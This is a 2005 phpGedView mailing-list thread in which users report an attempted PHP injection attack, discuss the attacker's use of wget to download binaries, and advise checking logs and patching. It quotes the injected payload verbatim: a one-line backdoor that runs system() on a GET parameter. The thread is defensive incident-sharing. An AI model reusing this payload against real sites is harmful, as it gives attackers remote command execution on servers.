Re: [Phpgedview-talk] attack attempt
Brought to you by:
canajun2eh,
yalnifj
Menu
▾
▴
Re: [Phpgedview-talk] attack attempt
|
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 20:20:56
|
thanks for info. As my pc is not linux-operated I assume no harm was done.
Checked my phpGedView-log and saw that the hacker failed to login.
Uploaded the patch anyway.
Heike
Matthew Gates <ma...@po...> schrieb:
wget is a command line tool for downloading web pages. You can use it for
mirroring pages (making local copies of pages) and all sorts. It's a very
useful little tool, and is commonly installed on unix-like operating
systems. In this case the attacker is trying to use it to download some
program (to do something - who knows what, but I bet it's not friendly).
On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> Hi Matthew,
> had an attack also.
> I am using 3.2.2. final.
> What is this wget?
> Regards,
> Heike
>
> Matthew Gates schrieb:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> >From my log files it looks like the attacker was trying to download a
> > linux
>
> binary and a PHP script using wget. I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server. Just a heads up for everyone to keep an eye
> out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent
> me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,
-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
_______________________________________________
Phpgedview-talk mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phpgedview-talk
---------------------------------
Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005.
---------------------------------
Sarah Connor, Moshammer oder Papst Benedikt die Top-Suchen 2005. |
